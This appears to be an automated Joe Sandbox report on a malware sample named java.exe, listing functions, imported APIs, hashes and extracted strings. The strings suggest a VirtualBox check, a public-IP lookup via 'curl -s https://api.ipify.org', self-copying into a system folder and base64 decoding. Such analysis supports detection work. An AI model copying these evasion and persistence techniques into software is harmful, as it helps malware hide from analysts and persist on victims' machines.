                                        • Source File: 00000006.00000002.2060431561.00007FF65E1F1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF65E1F0000, based on PE: true
                                        • Associated: 00000006.00000002.2060414733.00007FF65E1F0000.00000002.00000001.01000000.00000005.sdmp
                                        • Associated: 00000006.00000002.2060452458.00007FF65E200000.00000002.00000001.01000000.00000005.sdmp
                                        • Associated: 00000006.00000002.2060470362.00007FF65E207000.00000004.00000001.01000000.00000005.sdmp
                                        • Associated: 00000006.00000002.2060486628.00007FF65E208000.00000002.00000001.01000000.00000005.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_7ff65e1f0000_java.jbxd
                                        Similarity
                                        • API ID: memmove$_invalid_parameter_noinfo_noreturnfgets$_pclose_popen
                                        • String ID: curl -s $https://api.ipify.org
                                        • API String ID: 4263605086-4145788705
                                        • Opcode ID: ae73d1421c309b4769a2fb54ff61077935537acb340cbfafb32d3ed8a36bdc6c
                                        • Instruction ID: 1cc886d5c3cc952779a1823dcd059627f0810794d92ab1cfb693438110ffe709
                                        • Opcode Fuzzy Hash: ae73d1421c309b4769a2fb54ff61077935537acb340cbfafb32d3ed8a36bdc6c
                                        • Instruction Fuzzy Hash: 7591D062F18B8181FE10CB64D6002BD2361FBA57A4F585331EE6D67A9AEF7CE581C740

                                        Control-flow Graph

                                        APIs
                                        • ?good@ios_base@std@@QEBA_NXZ.MSVCP140 ref: 00007FF65E1F45A9
                                        • ?flush@?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV12@XZ.MSVCP140 ref: 00007FF65E1F45C9
                                        • ?good@ios_base@std@@QEBA_NXZ.MSVCP140 ref: 00007FF65E1F45D9
                                        • ?sputc@?$basic_streambuf@DU?$char_traits@D@std@@@std@@QEAAHD@Z.MSVCP140 ref: 00007FF65E1F4626
                                        • ?sputn@?$basic_streambuf@DU?$char_traits@D@std@@@std@@QEAA_JPEBD_J@Z.MSVCP140 ref: 00007FF65E1F464F
                                        • ?sputc@?$basic_streambuf@DU?$char_traits@D@std@@@std@@QEAAHD@Z.MSVCP140 ref: 00007FF65E1F4676
                                        • ?setstate@?$basic_ios@DU?$char_traits@D@std@@@std@@QEAAXH_N@Z.MSVCP140 ref: 00007FF65E1F46BC
                                        • ?uncaught_exceptions@std@@YAHXZ.MSVCP140 ref: 00007FF65E1F46C3
                                        • ?_Osfx@?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAXXZ.MSVCP140 ref: 00007FF65E1F46D0
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.2060431561.00007FF65E1F1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF65E1F0000, based on PE: true
                                        • Associated: 00000006.00000002.2060414733.00007FF65E1F0000.00000002.00000001.01000000.00000005.sdmp
                                        • Associated: 00000006.00000002.2060452458.00007FF65E200000.00000002.00000001.01000000.00000005.sdmp
                                        • Associated: 00000006.00000002.2060470362.00007FF65E207000.00000004.00000001.01000000.00000005.sdmp
                                        • Associated: 00000006.00000002.2060486628.00007FF65E208000.00000002.00000001.01000000.00000005.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_7ff65e1f0000_java.jbxd
                                        Similarity
                                        • API ID: D@std@@@std@@U?$char_traits@$?good@ios_base@std@@?sputc@?$basic_streambuf@$?flush@?$basic_ostream@?setstate@?$basic_ios@?sputn@?$basic_streambuf@?uncaught_exceptions@std@@Osfx@?$basic_ostream@V12@
                                        • String ID: VBox
                                        • API String ID: 4121003011-8870058
                                        • Opcode ID: 8d9f1fcbf29990ccba68683eb9388bbe1b18308a65f00ed4dbf19797e9948431
                                        • Instruction ID: 43a57c6c12c10d19425375bd8f02ada352a04e5e74cb776f8ee984f6a251441a
                                        • Opcode Fuzzy Hash: 8d9f1fcbf29990ccba68683eb9388bbe1b18308a65f00ed4dbf19797e9948431
                                        • Instruction Fuzzy Hash: E8512E72608A4181EF21DF1AE690238A7A0FF95FA5F19C531EE6E937A0DF3DD4468350

                                        Control-flow Graph

                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.2060431561.00007FF65E1F1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF65E1F0000, based on PE: true
                                        • Associated: 00000006.00000002.2060414733.00007FF65E1F0000.00000002.00000001.01000000.00000005.sdmp
                                        • Associated: 00000006.00000002.2060452458.00007FF65E200000.00000002.00000001.01000000.00000005.sdmp
                                        • Associated: 00000006.00000002.2060470362.00007FF65E207000.00000004.00000001.01000000.00000005.sdmp
                                        • Associated: 00000006.00000002.2060486628.00007FF65E208000.00000002.00000001.01000000.00000005.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_7ff65e1f0000_java.jbxd
                                        Similarity
                                        • API ID: File$memmove$AttributesCopyFolderFreeKnownModuleNamePathTask_invalid_parameter_noinfo_noreturn
                                        • String ID: System$\java.exe
                                        • API String ID: 1966085478-2838124431
                                        • Opcode ID: 9df640e94e4460063b0ebfa5c6d29310eec143933f45953db38a7472d5bb157b
                                        • Instruction ID: c1cae39efa4f95323eba040c0d30252e2db170f92cedf2f80e0026646df9ecf8
                                        • Opcode Fuzzy Hash: 9df640e94e4460063b0ebfa5c6d29310eec143933f45953db38a7472d5bb157b
                                        • Instruction Fuzzy Hash: 4A41D132A18A8182EF20CF25E65436D7361FB98B94F445531EAADA3B98DF7CE194C340
                                        APIs
                                        • ?good@ios_base@std@@QEBA_NXZ.MSVCP140 ref: 00007FF65E1F3B25
                                        • ?flush@?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV12@XZ.MSVCP140 ref: 00007FF65E1F3B45
                                        • ?good@ios_base@std@@QEBA_NXZ.MSVCP140 ref: 00007FF65E1F3B55
                                        • ?sputc@?$basic_streambuf@DU?$char_traits@D@std@@@std@@QEAAHD@Z.MSVCP140 ref: 00007FF65E1F3B9C
                                        • ?sputn@?$basic_streambuf@DU?$char_traits@D@std@@@std@@QEAA_JPEBD_J@Z.MSVCP140 ref: 00007FF65E1F3BC9
                                        • ?sputc@?$basic_streambuf@DU?$char_traits@D@std@@@std@@QEAAHD@Z.MSVCP140 ref: 00007FF65E1F3BEA
                                        • ?setstate@?$basic_ios@DU?$char_traits@D@std@@@std@@QEAAXH_N@Z.MSVCP140 ref: 00007FF65E1F3C30
                                        • ?uncaught_exceptions@std@@YAHXZ.MSVCP140 ref: 00007FF65E1F3C37
                                        • ?_Osfx@?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAXXZ.MSVCP140 ref: 00007FF65E1F3C44
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.2060431561.00007FF65E1F1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF65E1F0000, based on PE: true
                                        • Associated: 00000006.00000002.2060414733.00007FF65E1F0000.00000002.00000001.01000000.00000005.sdmp
                                        • Associated: 00000006.00000002.2060452458.00007FF65E200000.00000002.00000001.01000000.00000005.sdmp
                                        • Associated: 00000006.00000002.2060470362.00007FF65E207000.00000004.00000001.01000000.00000005.sdmp
                                        • Associated: 00000006.00000002.2060486628.00007FF65E208000.00000002.00000001.01000000.00000005.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_7ff65e1f0000_java.jbxd
                                        Similarity
                                        • API ID: D@std@@@std@@U?$char_traits@$?good@ios_base@std@@?sputc@?$basic_streambuf@$?flush@?$basic_ostream@?setstate@?$basic_ios@?sputn@?$basic_streambuf@?uncaught_exceptions@std@@Osfx@?$basic_ostream@V12@
                                        • String ID:
                                        • API String ID: 4121003011-0
                                        • Opcode ID: 32c923d81eb2f926df63972f162163bef63c4a2309fcb996621e0580ae7188cd
                                        • Instruction ID: 067fdf125ebc2e52267d891ebf92c725b04f7131eac7d41ad4e0ee6d6274cd74
                                        • Opcode Fuzzy Hash: 32c923d81eb2f926df63972f162163bef63c4a2309fcb996621e0580ae7188cd
                                        • Instruction Fuzzy Hash: 6F513032608A4181EF708F19D6A063CABA0FFA5F95F198532EE5E937A4CF3DD4468350
                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.2060431561.00007FF65E1F1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF65E1F0000, based on PE: true
                                        • Associated: 00000006.00000002.2060414733.00007FF65E1F0000.00000002.00000001.01000000.00000005.sdmp
                                        • Associated: 00000006.00000002.2060452458.00007FF65E200000.00000002.00000001.01000000.00000005.sdmp
                                        • Associated: 00000006.00000002.2060470362.00007FF65E207000.00000004.00000001.01000000.00000005.sdmp
                                        • Associated: 00000006.00000002.2060486628.00007FF65E208000.00000002.00000001.01000000.00000005.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_7ff65e1f0000_java.jbxd
                                        Similarity
                                        • API ID: memset$_invalid_parameter_noinfo_noreturnlocaleconvmalloc
                                        • String ID: Security$System
                                        • API String ID: 4120556116-2661570791
                                        • Opcode ID: 7e827c1aa1cd5d5c5d66c3ad686d95bbe85674a424d3ce88bcbd9dfe1239f2c9
                                        • Instruction ID: a5958d309c154395c78ae13f3b0513da79c5f218d2e59b09abb10c1b048eab3f
                                        • Opcode Fuzzy Hash: 7e827c1aa1cd5d5c5d66c3ad686d95bbe85674a424d3ce88bcbd9dfe1239f2c9
                                        • Instruction Fuzzy Hash: BE81C232A04BC186EB60CF25E9443AD37A0F7A9B94F188225EA9D97B95DF3CC581C750
                                        APIs
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.2060431561.00007FF65E1F1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF65E1F0000, based on PE: true
                                        • Associated: 00000006.00000002.2060414733.00007FF65E1F0000.00000002.00000001.01000000.00000005.sdmp
                                        • Associated: 00000006.00000002.2060452458.00007FF65E200000.00000002.00000001.01000000.00000005.sdmp
                                        • Associated: 00000006.00000002.2060470362.00007FF65E207000.00000004.00000001.01000000.00000005.sdmp
                                        • Associated: 00000006.00000002.2060486628.00007FF65E208000.00000002.00000001.01000000.00000005.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_7ff65e1f0000_java.jbxd
                                        Similarity
                                        • API ID: __p___argc__p___argv__scrt_acquire_startup_lock__scrt_release_startup_lock_cexit_exit_get_initial_narrow_environment_register_thread_local_exe_atexit_callback
                                        • String ID:
                                        • API String ID: 1133592946-0
                                        • Opcode ID: a2b6e63c03c4307f1c7944bccec6fd587a45c4b5608812da48b03e94cda5521b
                                        • Instruction ID: 005a31784e9ee1f00b0105eab9ff6c6150fee0db45bb632082c4cc818f54a8af
                                        • Opcode Fuzzy Hash: a2b6e63c03c4307f1c7944bccec6fd587a45c4b5608812da48b03e94cda5521b
                                        • Instruction Fuzzy Hash: 39313B61A0C50381FE60BB2197157B92391AFA57C4F4C5139FA6EE72D7DE2CA40482F5
                                        APIs
                                        • malloc.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,7FFFFFFFFFFFFFFF,00007FF65E1F3975), ref: 00007FF65E1FDA0A
                                        • Concurrency::cancel_current_task.LIBCPMT ref: 00007FF65E1FDA20
                                          • Part of subcall function 00007FF65E1FE1EC: std::bad_alloc::bad_alloc.LIBCMT ref: 00007FF65E1FE1F5
                                          • Part of subcall function 00007FF65E1FE1EC: _CxxThrowException.VCRUNTIME140(?,?,?,?,?,?,?,?,00007FF65E1FDA25,?,?,7FFFFFFFFFFFFFFF,00007FF65E1F3975), ref: 00007FF65E1FE206
                                        • Concurrency::cancel_current_task.LIBCPMT ref: 00007FF65E1FDA26
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.2060431561.00007FF65E1F1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF65E1F0000, based on PE: true
                                        • Associated: 00000006.00000002.2060414733.00007FF65E1F0000.00000002.00000001.01000000.00000005.sdmp
                                        • Associated: 00000006.00000002.2060452458.00007FF65E200000.00000002.00000001.01000000.00000005.sdmp
                                        • Associated: 00000006.00000002.2060470362.00007FF65E207000.00000004.00000001.01000000.00000005.sdmp
                                        • Associated: 00000006.00000002.2060486628.00007FF65E208000.00000002.00000001.01000000.00000005.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_7ff65e1f0000_java.jbxd
                                        Similarity
                                        • API ID: Concurrency::cancel_current_task$ExceptionThrowmallocstd::bad_alloc::bad_alloc
                                        • String ID:
                                        • API String ID: 594857686-0
                                        • Opcode ID: 9dee0384807c4d253cdcdcb94958414db6b7803d00181a6a14837a4265a6d2e0
                                        • Instruction ID: 0df02051cbc55ad94ea6f97a1d8d5f7d1a1b20f3ca28b55b66847e3e2c2df129
                                        • Opcode Fuzzy Hash: 9dee0384807c4d253cdcdcb94958414db6b7803d00181a6a14837a4265a6d2e0
                                        • Instruction Fuzzy Hash: 36E01280E1E14788FE782A621B251B401445F393B4F1C2B30F83EE52C3ED1CA88281B9
                                        APIs
                                        • ?widen@?$basic_ios@DU?$char_traits@D@std@@@std@@QEBADD@Z.MSVCP140 ref: 00007FF65E1F4725
                                        • ?put@?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV12@D@Z.MSVCP140 ref: 00007FF65E1F4731
                                        • ?flush@?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV12@XZ.MSVCP140 ref: 00007FF65E1F473A
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.2060431561.00007FF65E1F1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF65E1F0000, based on PE: true
                                        • Associated: 00000006.00000002.2060414733.00007FF65E1F0000.00000002.00000001.01000000.00000005.sdmp
                                        • Associated: 00000006.00000002.2060452458.00007FF65E200000.00000002.00000001.01000000.00000005.sdmp
                                        • Associated: 00000006.00000002.2060470362.00007FF65E207000.00000004.00000001.01000000.00000005.sdmp
                                        • Associated: 00000006.00000002.2060486628.00007FF65E208000.00000002.00000001.01000000.00000005.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_7ff65e1f0000_java.jbxd
                                        Similarity
                                        • API ID: D@std@@@std@@U?$char_traits@$V12@$?flush@?$basic_ostream@?put@?$basic_ostream@?widen@?$basic_ios@
                                        • String ID:
                                        • API String ID: 1875450691-0
                                        • Opcode ID: f4125d65197c8cd84bb38f550762ca1077ffddb23cb634167d8243e328fd1d8f
                                        • Instruction ID: 9e8df31c593a73e54e212829d68c54e77f45e5249969faa42b4cb05b2d1d9a27
                                        • Opcode Fuzzy Hash: f4125d65197c8cd84bb38f550762ca1077ffddb23cb634167d8243e328fd1d8f
                                        • Instruction Fuzzy Hash: 33D05B11B4460681EF085F16BEA44382320DF59F51B0C9431DD0F57394DD3CD0958300
                                        APIs
                                        • CryptStringToBinaryA.CRYPT32 ref: 00007FF65E1F6065
                                        • memset.VCRUNTIME140(?,?,?,?,?,?,?,?,?,?,?,?,?,?,System,?), ref: 00007FF65E1F60A6
                                        • CryptStringToBinaryA.CRYPT32 ref: 00007FF65E1F60DF
                                        • _CxxThrowException.VCRUNTIME140(?,?,?,?,?,?,?,?,?,?,?,?,?,?,System,?), ref: 00007FF65E1F6195
                                        • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,?,?,?,?,?,?,?,?,?,?,System,?), ref: 00007FF65E1F6141
                                          • Part of subcall function 00007FF65E1F11E0: __std_exception_copy.VCRUNTIME140 ref: 00007FF65E1F121E
                                        • _CxxThrowException.VCRUNTIME140(?,?,?,?,?,?,?,?,?,?,?,?,?,?,System,?), ref: 00007FF65E1F61B8
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.2060431561.00007FF65E1F1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF65E1F0000, based on PE: true
                                        • Associated: 00000006.00000002.2060414733.00007FF65E1F0000.00000002.00000001.01000000.00000005.sdmp
                                        • Associated: 00000006.00000002.2060452458.00007FF65E200000.00000002.00000001.01000000.00000005.sdmp
                                        • Associated: 00000006.00000002.2060470362.00007FF65E207000.00000004.00000001.01000000.00000005.sdmp
                                        • Associated: 00000006.00000002.2060486628.00007FF65E208000.00000002.00000001.01000000.00000005.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_7ff65e1f0000_java.jbxd
                                        Similarity
                                        • API ID: BinaryCryptExceptionStringThrow$__std_exception_copy_invalid_parameter_noinfo_noreturnmemset
                                        • String ID: Failed to calculate decoded size$Failed to decode base64 string$System
                                        • API String ID: 1426166207-3746013482
                                        • Opcode ID: 14ac3170ead7c7aae9ce120748a7062de75bf1bef9c06f2a4d6b0291c8387342
                                        • Instruction ID: 28e309506083ef9c5f2e08dfb1cec9e51f71c9764c66a3a23a0ea0e2bb878826
                                        • Opcode Fuzzy Hash: 14ac3170ead7c7aae9ce120748a7062de75bf1bef9c06f2a4d6b0291c8387342
                                        • Instruction Fuzzy Hash: 6E419132A18B4681EE60DF11E54066A7361FBD57C0F584235FA9D93AA9DF3CE581CB80
                                        APIs
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.2060431561.00007FF65E1F1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF65E1F0000, based on PE: true
                                        • Associated: 00000006.00000002.2060414733.00007FF65E1F0000.00000002.00000001.01000000.00000005.sdmp
                                        • Associated: 00000006.00000002.2060452458.00007FF65E200000.00000002.00000001.01000000.00000005.sdmp
                                        • Associated: 00000006.00000002.2060470362.00007FF65E207000.00000004.00000001.01000000.00000005.sdmp
                                        • Associated: 00000006.00000002.2060486628.00007FF65E208000.00000002.00000001.01000000.00000005.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_7ff65e1f0000_java.jbxd
                                        Similarity
                                        • API ID: ExceptionFilterPresentUnhandledmemset$CaptureContextDebuggerEntryFeatureFunctionLookupProcessorUnwindVirtual
                                        • String ID:
                                        • API String ID: 313767242-0
                                        • Opcode ID: 9976b80456451c459783d82c79ee402152503cdb330eb85bcad0ad8866f3e4c9
                                        • Instruction ID: 191b8a4bb5eae02fbfba77d81a176eb2f38ab94e75eaf0d206862dbb000cc0cf
                                        • Opcode Fuzzy Hash: 9976b80456451c459783d82c79ee402152503cdb330eb85bcad0ad8866f3e4c9
                                        • Instruction Fuzzy Hash: BF315D72608B8186EF608F60E9547EE7360FB94714F48443AEA4E97B98EF3CD648C714
                                        APIs
                                        • ?good@ios_base@std@@QEBA_NXZ.MSVCP140 ref: 00007FF65E1FB158
                                        • ?flush@?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV12@XZ.MSVCP140 ref: 00007FF65E1FB178
                                        • ?good@ios_base@std@@QEBA_NXZ.MSVCP140 ref: 00007FF65E1FB188
                                        • ?getloc@ios_base@std@@QEBA?AVlocale@2@XZ.MSVCP140 ref: 00007FF65E1FB1AD
                                        • ??0_Lockit@std@@QEAA@H@Z.MSVCP140 ref: 00007FF65E1FB1C0
                                        • ??Bid@locale@std@@QEAA_KXZ.MSVCP140 ref: 00007FF65E1FB1DD
                                        • ?_Getgloballocale@locale@std@@CAPEAV_Locimp@12@XZ.MSVCP140 ref: 00007FF65E1FB20F
                                        • ?_Getcat@?$time_put@DV?$ostreambuf_iterator@DU?$char_traits@D@std@@@std@@@std@@SA_KPEAPEBVfacet@locale@2@PEBV42@@Z.MSVCP140 ref: 00007FF65E1FB240
                                        • ??1_Lockit@std@@QEAA@XZ.MSVCP140 ref: 00007FF65E1FB288
                                        • ?put@?$time_put@DV?$ostreambuf_iterator@DU?$char_traits@D@std@@@std@@@std@@QEBA?AV?$ostreambuf_iterator@DU?$char_traits@D@std@@@2@V32@AEAVios_base@2@DPEBUtm@@PEBD3@Z.MSVCP140 ref: 00007FF65E1FB31B
                                        • ?setstate@?$basic_ios@DU?$char_traits@D@std@@@std@@QEAAXH_N@Z.MSVCP140 ref: 00007FF65E1FB338
                                        • ?uncaught_exceptions@std@@YAHXZ.MSVCP140 ref: 00007FF65E1FB346
                                        • ?_Osfx@?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAXXZ.MSVCP140 ref: 00007FF65E1FB353
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.2060431561.00007FF65E1F1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF65E1F0000, based on PE: true
                                        • Associated: 00000006.00000002.2060414733.00007FF65E1F0000.00000002.00000001.01000000.00000005.sdmp
                                        • Associated: 00000006.00000002.2060452458.00007FF65E200000.00000002.00000001.01000000.00000005.sdmp
                                        • Associated: 00000006.00000002.2060470362.00007FF65E207000.00000004.00000001.01000000.00000005.sdmp
                                        • Associated: 00000006.00000002.2060486628.00007FF65E208000.00000002.00000001.01000000.00000005.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_7ff65e1f0000_java.jbxd
                                        Similarity
                                        • API ID: U?$char_traits@$D@std@@@std@@V?$ostreambuf_iterator@$?good@ios_base@std@@D@std@@@std@@@std@@Lockit@std@@$??0_??1_?flush@?$basic_ostream@?getloc@ios_base@std@@?put@?$time_put@?setstate@?$basic_ios@?uncaught_exceptions@std@@Bid@locale@std@@D@std@@@2@Getcat@?$time_put@Getgloballocale@locale@std@@Locimp@12@Osfx@?$basic_ostream@Utm@@V12@V32@V42@@Vfacet@locale@2@Vios_base@2@Vlocale@2@
                                        • String ID: Security$System
                                        • API String ID: 2601024164-2661570791
                                        • Opcode ID: 32f99a87d3a5ab311aaa68574cd87bda19d4f3e88d22cf0ee314562ff2212286
                                        • Instruction ID: 92385444aaf9607a46812807744570ee372c8aded84525591959173392dfb2cf
                                        • Opcode Fuzzy Hash: 32f99a87d3a5ab311aaa68574cd87bda19d4f3e88d22cf0ee314562ff2212286
                                        • Instruction Fuzzy Hash: 83718A22609A8185EF64CF15E7A077E7761FBA5B80F088532EAAE937A4DF3CD445C340
                                        APIs
                                        • ?good@ios_base@std@@QEBA_NXZ.MSVCP140 ref: 00007FF65E1F3329
                                        • ?flush@?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV12@XZ.MSVCP140 ref: 00007FF65E1F3349
                                        • ?good@ios_base@std@@QEBA_NXZ.MSVCP140 ref: 00007FF65E1F3359
                                        • ?sputc@?$basic_streambuf@DU?$char_traits@D@std@@@std@@QEAAHD@Z.MSVCP140 ref: 00007FF65E1F33B5
                                        • ?sputc@?$basic_streambuf@DU?$char_traits@D@std@@@std@@QEAAHD@Z.MSVCP140 ref: 00007FF65E1F33DF
                                        • ?sputc@?$basic_streambuf@DU?$char_traits@D@std@@@std@@QEAAHD@Z.MSVCP140 ref: 00007FF65E1F340E
                                        • ?setstate@?$basic_ios@DU?$char_traits@D@std@@@std@@QEAAXH_N@Z.MSVCP140 ref: 00007FF65E1F3459
                                        • ?uncaught_exceptions@std@@YAHXZ.MSVCP140 ref: 00007FF65E1F3460
                                        • ?_Osfx@?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAXXZ.MSVCP140 ref: 00007FF65E1F346D
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.2060431561.00007FF65E1F1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF65E1F0000, based on PE: true
                                        • Associated: 00000006.00000002.2060414733.00007FF65E1F0000.00000002.00000001.01000000.00000005.sdmp
                                        • Associated: 00000006.00000002.2060452458.00007FF65E200000.00000002.00000001.01000000.00000005.sdmp
                                        • Associated: 00000006.00000002.2060470362.00007FF65E207000.00000004.00000001.01000000.00000005.sdmp
                                        • Associated: 00000006.00000002.2060486628.00007FF65E208000.00000002.00000001.01000000.00000005.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_7ff65e1f0000_java.jbxd
                                        Similarity
                                        • API ID: D@std@@@std@@U?$char_traits@$?sputc@?$basic_streambuf@$?good@ios_base@std@@$?flush@?$basic_ostream@?setstate@?$basic_ios@?uncaught_exceptions@std@@Osfx@?$basic_ostream@V12@
                                        • String ID:
                                        • API String ID: 3107587312-0
                                        • Opcode ID: 4a2502ecc8ca070d43367042e3d12e437e7251f46653fbf343002d1584a05c5c
                                        • Instruction ID: eb4576c565159a16ef505755efa52a663c7bd3fc41f166b5e9c943f59859230d
                                        • Opcode Fuzzy Hash: 4a2502ecc8ca070d43367042e3d12e437e7251f46653fbf343002d1584a05c5c
                                        • Instruction Fuzzy Hash: DB514132608A8186EF25CF19E6D063CB7A0FFA4F95B198536DA5E937A0CE2DD4468340
                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.2060431561.00007FF65E1F1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF65E1F0000, based on PE: true
                                        • Associated: 00000006.00000002.2060414733.00007FF65E1F0000.00000002.00000001.01000000.00000005.sdmp
                                        • Associated: 00000006.00000002.2060452458.00007FF65E200000.00000002.00000001.01000000.00000005.sdmp
                                        • Associated: 00000006.00000002.2060470362.00007FF65E207000.00000004.00000001.01000000.00000005.sdmp
                                        • Associated: 00000006.00000002.2060486628.00007FF65E208000.00000002.00000001.01000000.00000005.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_7ff65e1f0000_java.jbxd
                                        Similarity
                                        • API ID: memmove$Concurrency::cancel_current_task_invalid_parameter_noinfo_noreturn
                                        • String ID: \java.exe
                                        • API String ID: 2016347663-3009632800
                                        • Opcode ID: 4bf9be07dc1a305eeaf47fa471ca790812da740372db822ec18e086f487c3532
                                        • Instruction ID: 96e213d36192a345903dc2952227ba1a356614404e97cbf30276789d11a8dc86
                                        • Opcode Fuzzy Hash: 4bf9be07dc1a305eeaf47fa471ca790812da740372db822ec18e086f487c3532
                                        • Instruction Fuzzy Hash: 5141E162B09B4191EE209B15E6442AD6351FB58BE0F980731EABDAB7E5EF3CD441C350
                                        APIs
                                        • memmove.VCRUNTIME140(?,00000000,00000008,?,00007FF65E1F1568), ref: 00007FF65E1F3D6A
                                        • memmove.VCRUNTIME140(?,00000000,00000008,?,00007FF65E1F1568), ref: 00007FF65E1F3D79
                                        • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,00000000,00000008,?,00007FF65E1F1568), ref: 00007FF65E1F3DAD
                                        • memmove.VCRUNTIME140(?,00000000,00000008,?,00007FF65E1F1568), ref: 00007FF65E1F3DB4
                                        • memmove.VCRUNTIME140(?,00000000,00000008,?,00007FF65E1F1568), ref: 00007FF65E1F3DC3
                                        • Concurrency::cancel_current_task.LIBCPMT ref: 00007FF65E1F3DEE
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.2060431561.00007FF65E1F1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF65E1F0000, based on PE: true
                                        • Associated: 00000006.00000002.2060414733.00007FF65E1F0000.00000002.00000001.01000000.00000005.sdmp
                                        • Associated: 00000006.00000002.2060452458.00007FF65E200000.00000002.00000001.01000000.00000005.sdmp
                                        • Associated: 00000006.00000002.2060470362.00007FF65E207000.00000004.00000001.01000000.00000005.sdmp
                                        • Associated: 00000006.00000002.2060486628.00007FF65E208000.00000002.00000001.01000000.00000005.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_7ff65e1f0000_java.jbxd
                                        Similarity
                                        • API ID: memmove$Concurrency::cancel_current_task_invalid_parameter_noinfo_noreturn
                                        • String ID: curl -s
                                        • API String ID: 2016347663-820363595
                                        • Opcode ID: a562037bf8f08733c6859b3403078e9e87e419d0620c49857303a3a5aa416be6
                                        • Instruction ID: f6b3f749150e1a601e4092cf422229bb363b1ca2c973baf51d9dca3e4da9320f
                                        • Opcode Fuzzy Hash: a562037bf8f08733c6859b3403078e9e87e419d0620c49857303a3a5aa416be6
                                        • Instruction Fuzzy Hash: 8241A361B0974195EE209B169A042B86255EF54BD0F980632EE7D9B7D6DF3CE041C3A0
                                        APIs
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.2060431561.00007FF65E1F1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF65E1F0000, based on PE: true
                                        • Associated: 00000006.00000002.2060414733.00007FF65E1F0000.00000002.00000001.01000000.00000005.sdmp
                                        • Associated: 00000006.00000002.2060452458.00007FF65E200000.00000002.00000001.01000000.00000005.sdmp
                                        • Associated: 00000006.00000002.2060470362.00007FF65E207000.00000004.00000001.01000000.00000005.sdmp
                                        • Associated: 00000006.00000002.2060486628.00007FF65E208000.00000002.00000001.01000000.00000005.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_7ff65e1f0000_java.jbxd
                                        Similarity
                                        • API ID: _invalid_parameter_noinfo_noreturnmemmove$Concurrency::cancel_current_task$?out@?$codecvt@_Mbstatet@@Mbstatet@@@std@@
                                        • String ID:
                                        • API String ID: 525765215-0
                                        • Opcode ID: c6cdeb64eca4f1f961e730b4080fa50bdbe3b7e8eb71886a262a1a5eee0e9623
                                        • Instruction ID: c0eb847db99d27918d8ad98ea4f41f5a29fc1fcfb873de9496dc676edcac02ef
                                        • Opcode Fuzzy Hash: c6cdeb64eca4f1f961e730b4080fa50bdbe3b7e8eb71886a262a1a5eee0e9623
                                        • Instruction Fuzzy Hash: D2B1E362F18B418AFF20CBA4D1542EC2362EB65798F485231EE6DA7BD9DE3CD045C390
                                        APIs
                                          • Part of subcall function 00007FF65E1F34A0: memmove.VCRUNTIME140(?,?,?,?,00007FF65E1F14B3), ref: 00007FF65E1F34D8
                                          • Part of subcall function 00007FF65E1F34A0: memmove.VCRUNTIME140(?,?,?,?,00007FF65E1F14B3), ref: 00007FF65E1F3579
